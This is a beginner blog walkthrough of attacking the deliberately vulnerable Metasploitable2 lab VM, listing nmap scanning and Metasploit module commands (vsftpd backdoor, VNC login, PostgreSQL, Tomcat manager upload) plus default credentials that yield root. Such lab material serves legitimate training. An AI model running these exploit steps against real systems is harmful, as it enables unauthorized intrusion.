Practice Live Virtual Machine: Metasploitable2 for Beginners : Walkthrough

 

 Metasploitable2


Are you ready to practice ethical hacking and penetration testing?
Metasploitable2 is a vulnerable virtual machine designed specifically for training purposes. In this guide, we’ll show you how to set up Metasploitable2 easily on your system and start practicing various cybersecurity skills in a safe environment. Whether you’re a beginner or preparing for certification exams, mastering Metasploitable2 is a must!

Introduction:

Metasploitable2, developed by Rapid7, is a valuable tool designed for developing and executing exploits against vulnerable systems. This walkthrough outlines the step-by-step process of exploiting different ports on Metasploitable2 for educational purposes.

Discovery Phase:

The default login credentials for the Metasploitable2 machine is msfadmin:msfadmin.

Figure 1: Metasploitable2 Machine

Identifying the victim’s IP address using the `ifconfig` command.

Figure 2: ifconfig

Utilizing Kali Linux with Nmap to scan open ports on the Metasploitable2 machine:

Command: sudo nmap -sV -Pn <Target/Victim Machine IP>

Figure 3: nmap scanning

 

1. FTP Exploitation (Port 21):

FTP (File Transfer Protocol) is a standard network protocol used for the transfer of files between a client and a server on a computer network. It enables the uploading and downloading of files, providing a simple way to share and manage data.

- Method 1: Establishing a connection using FTP credentials.

Command: `ftp 192.168.137.128`

Figure 4: Ftp connection

Method 2: Exploiting FTP through the Metasploit framework.

- Commands:

-msfconsole

Figure 5: msfconsole

Command: search vsftpd

Figure 6: vsftpd

- use exploit/unix/ftp/vsftpd_234_backdoor

- set RHOSTS 192.168.137.128

-run

Figure 7:  gained root access through FTP exploits.

 

 

2. Telnet Exploitation (Port 23):

Telnet is a simple, text-based network protocol that is used for accessing remote computers over TCP/IP networks like the Internet.

Connecting to Telnet using the command: `telnet 192.168.137.128`.

Figure 8: Root access is achieved via Telnet exploits.

 

3. VNC Exploitation (Port 5900):

Port 5900 is commonly associated with VNC (Virtual Network Computing), a remote desktop sharing system. When used in combination with VNC, port 5900 is often the default port for the initial display (desktop) on a VNC server. VNC allows a user to view and interact with the graphical desktop environment of a remote computer over a network.

- Utilizing Metasploit to exploit VNC login.

- Commands:

- msfconsole

- search auxiliary/scanner/vnc/vnc_login

-set RHOST 192.168.137.128

Figure 9: VNC exploit

-vncviewer 192.168.137.128

Figure 10: Pop windows of VNC

Figure 11: Root access is secured through VNC exploits.

4. PostgreSQL Exploitation (Port 5432):

PostgreSQL is a powerful open-source relational database management system (RDBMS) known for its extensibility and advanced features, providing a robust platform for managing and querying structured data.

- Searching and exploiting PostgreSQL vulnerabilities.

- Commands:

- msfconsole

-search PostgreSQL

Figure 12: Postgresql

- set RHOSTS 192.168.137.128

- set LHOST 192.168.137.129

-run

Figure 13: postgres payload

Figure 14: acquired root access via PostgreSQL exploits.

5. Apache Tomcat Exploitation (Port 8180):

Apache Tomcat is an open-source application server that executes Java servlets and JavaServer Pages, providing a robust environment for Java-based web applications. It serves as a reliable and scalable platform for deploying Java web applications.

- Searching for Apache Tomcat exploits in Metasploit.

- Commands:

- msfconsole

-search apache tomcat

Figure 15: search apache

- use exploit/multi/http/tomcat_mgr_upload

- set RHOSTS 192.168.137.128

- set RPORT 8180

-set HttpPassword tomcat

Figure 16: SET

-set HttpUsername tomcat

-run

Figure 17: Root access is attained through Apache Tomcat exploits.

 

 

 

Comments

Post a Comment

Popular posts from this blog

Top CTF Competitions to become a Hacker

Image
  Top CTF Competitions and Where to Practice Capture The Flag (CTF) competitions have grown into one of the most popular and effective ways to enhance cybersecurity skills. From reverse engineering to web exploitation, these competitions cover a wide range of challenges for beginners, students, and professionals. In this blog, we’ll cover some of the top CTF competitions across the globe and provide resources on where to practice if you’re preparing for these challenges. 1. DEF CON CTF (Elite-Level) Level : Advanced   Overview : Known as the most prestigious CTF in the cybersecurity world, DEF CON CTF attracts elite hackers and security professionals. The competition demands advanced knowledge in areas such as exploitation, reverse engineering, and complex cryptography. Teams from all over the globe compete for glory at the annual DEF CON hacking conference in Las Vegas.   Why It’s Elite : DEF CON CTF features real-world security challenges that mirror high-level, r...
Read more

Every Cybersecurity Tool You’ll Ever Need – Revealed!

Image
1. Reconnaissance Tools Recon-ng (Linux, Windows) : Modular OSINT tool for data gathering, APIs. theHarvester (Linux, Windows) : Gathers emails, subdomains from Google & LinkedIn. Nmap (Linux, Windows, macOS) : Network scanner for ports, OS, vulnerabilities. Zenmap (Linux, Windows, macOS) : Nmap’s GUI for visual scanning. DNSRecon (Linux, Windows) : DNS enumeration, domain records retrieval. Netdiscover (Linux) : Identifies live hosts in local networks. Maltego (Linux, Windows, macOS) : Data mining and visualization for OSINT. Unicornscan (Linux) : Asynchronous TCP/UDP scanner for large networks. p0f (Linux, Windows) : Passive OS fingerprinting via network traffic. Masscan (Linux) : Ultra-fast internet-wide port scanner. ZMap (Linux) : High-speed scanner for large IP ranges. 2. Vulnerability Scanning Tools OpenVAS (Linux) : Comprehensive vulnerability scanner for servers and networks. w3af (Linux, Windows) : Web application vulnerability scanner (SQLi, XSS). Nikto ...
Read more